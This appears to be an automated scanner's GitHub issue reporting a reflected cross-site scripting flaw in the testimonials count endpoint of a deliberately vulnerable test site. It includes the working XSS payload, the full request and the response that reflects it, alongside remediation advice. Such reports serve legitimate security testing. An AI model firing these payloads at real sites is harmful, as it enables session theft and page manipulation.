Skip to content

Reflective Cross-site scripting (rXSS) #5

Description

@bright-security

Reflective Cross-site scripting (rXSS)

Severity: High Discovered: 10 of October-2022, 11:11 PM

CWE ID

CWE-79

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Details

This vulnerability was found in the Query by changing the value of the parameter "".
The value ''"}}]]

' was injected, which caused the target to execute an alert function with the value 336728, which verified that the JavaScript injection was successful.

Possible exposure

Abusing Reflective XSS might allow an attacker to inject a malicious payload and steal cookie sessions and other sensitive data or to manipulate a user's integration with the application.

Remediation suggestions

To remedy this vulnerability, a proper input validation and sanitization should be applied to the "" parameter.
The best course of action is not to blacklist or disallow specific characters, but instead to verify that the input has the relevant types and structure.
For example, the value of the above parameter is detected as type: MultiParse::DataType::String. A good start is to verify that it is not a different type of data structure.
Another good approach is to validate that integer fields accept only integers, text fields only accept alphabetical characters (if possible) and types (such as JSON or other formatted objects) are verified and parsed before being digested and reflected back to the user.

Request

GET https://brokencrystals.com/api/testimonials/count?query=%27%22%7D%7D%5D%5D%3Cdiv+OnCliCk%3Dalert%28336728%29%3E%3C%2Fdiv%3E HTTP/1.1
Accept: application/json, text/plain, */*
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept-Encoding: identity
Content-Length: 0

Response

HTTP/1.1 200
Connection: keep-alive
Content-Length: 121
Content-Type: text/html
Date: Mon, 10 Oct 2022 23:11:11 GMT
Server: nginx/1.19.8
access-control-allow-origin: *
content-security-policy: default-src  * 'unsafe-inline' 'unsafe-eval'
strict-transport-security: max-age=0
vary: Origin
x-content-type-options: 1
x-xss-protection: 0
set-cookie: bc-calls-counter=1665443471281

'"}}]]<div OnCliCk=alert(336728)></div> - unterminated quoted string at or near "'"}}]]<div OnCliCk=alert(336728)></div>"

Screenshots

Screenshot (0)

External links

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions